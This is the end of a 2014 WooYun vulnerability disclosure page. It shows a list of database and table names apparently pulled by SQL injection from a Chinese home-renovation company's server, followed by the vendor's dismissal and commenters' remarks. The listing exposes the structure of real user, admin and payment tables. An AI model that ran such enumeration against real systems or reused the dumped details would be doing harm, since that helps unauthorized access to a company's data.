| dbs_tender_lose_log |
| dbs_tender_modify |
| dbs_tender_plan |
| dbs_tender_reject |
| dbs_tender_reject_log |
| dbs_tender_repeat |
| dbs_tender_status |
| dbs_tuku |
| dbs_tuku_category |
| dbs_tuku_img |
| dbs_user |
| dbs_user_extra |
| dbs_user_extra_account |
| footer_info |
| mobile_areacode |
| regions |
| report_analysis |
| report_manage |
| role_to_privilege |
| shop_admin |
| shop_money |
| shop_money_log |
| shop_tender_introduction |
| site_confirm |
| site_nav |
| user_info |
+---------------------------------------+
Database: ConfigDB
[3 tables]
+---------------------------------------+
| mysql_status |
| query_review |
| query_review_history |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Database: test
[3 tables]
+---------------------------------------+
| accesslog |
| checksums |
| dsns |
+---------------------------------------+
Database: _del_access_ip_count_20140609bak
[1 table]
+---------------------------------------+
| ip_count |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: _del_zhuangxiu.18.52_20140609bak
[52 tables]
+---------------------------------------+
| tag_relation |
| zx_activity |
| zx_ad_keyword |
| zx_admin_role |
| zx_admin_user |
| zx_answer |
| zx_apply |
| zx_areaflag |
| zx_build |
| zx_collect |
| zx_collect_cat |
| zx_comment |
| zx_comment_cat |
| zx_count |
| zx_dbs_koubei |
| zx_designer |
| zx_focus |
| zx_gallery |
| zx_hxt |
| zx_jia |
| zx_koubei_log |
| zx_message |
| zx_mobile_areacode |
| zx_order |
| zx_order_crm_log |
| zx_order_extend |
| zx_order_join |
| zx_order_modify |
| zx_order_reject |
| zx_order_remark |
| zx_privilege |
| zx_privilege_nav |
| zx_privilege_role |
| zx_question |
| zx_regions |
| zx_report_manage |
| zx_shop |
| zx_shop_class |
| zx_shop_cuxiao |
| zx_shop_extra |
| zx_shop_extra_jia |
| zx_shop_id_relation |
| zx_shop_jia |
| zx_shop_log |
| zx_shop_money |
| zx_shop_notice |
| zx_tag |
| zx_tag_cat |
| zx_tag_content |
| zx_tag_relation |
| zx_tuku |
| zx_tuku_img |
+---------------------------------------+

修复方案:

你比我懂.

版权声明:转载请注明来源 追逐天堂@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-18 10:55

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-11 09:25 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)
  2. 2014-06-13 11:03 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @Lonely 这个厂商不是存在怎么待认领..

  3. 2014-06-13 15:24 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    百分百忽略

  4. 2014-06-13 22:26 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    @魇 不知道呢 齐家看起来还挺不错的样子。

  5. 2014-06-18 12:49 | 假马 ( 普通白帽子 | Rank:142 漏洞数:18 | 我存在,你婶婶的脑海里.)

    啧啧啧。

  6. 2015-08-17 15:33 | 上海齐家网信息科技股份有限公司(乌云厂商)

    非问题,属于误报